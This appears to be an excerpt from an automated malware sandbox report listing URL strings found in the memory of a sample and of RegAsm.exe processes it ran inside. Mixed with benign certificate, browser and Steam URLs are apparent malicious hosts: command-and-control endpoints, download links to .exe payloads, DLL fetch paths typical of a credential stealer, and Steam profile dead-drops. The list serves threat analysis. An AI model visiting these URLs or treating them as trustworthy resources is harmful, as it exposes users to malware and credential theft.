Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.EBKECB
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2595193937.000000000148A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/G
Source: RegAsm.exe, 00000003.00000002.2595193937.000000000148A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/N
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgECB
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoKEBKECB
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeD
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeG
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeata;
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exef
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe2
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeX
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeta;
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe%
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe00Start4
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe1kkkk1253403http://files.veritas.org.ng/ldms/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe6
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe?9
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeG
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exei
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeta;
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exez
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/#
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/6
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/6z
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/9z
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/U
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/ZHh
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/freebl3.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/i
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/mozglue.dllT
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/msvcp140.dll6
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/nss3.dllF
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/ping
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/sql.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/sql.dllLMEM8(
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/u
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/vcruntime140.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/z
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.00000000004E6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80
Source: RegAsm.exe, 0000000E.00000002.2861588723.00000000004C5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80/2024
Source: RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:805938.134
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80AKE
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80AKEsrss.exe
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80GCA
Source: RegAsm.exe, 0000000E.00000002.2861588723.00000000004C5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80Lggz.exe
Source: RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80acPdLggz.exe
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2861588723.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.00000000004E6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80ta
Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80xe
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2624308757.000000002038D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3066275047.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agentyanlark.site/api
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/apij
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/M
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/o
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/q
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store:443/api
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/api
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000146F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/A
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
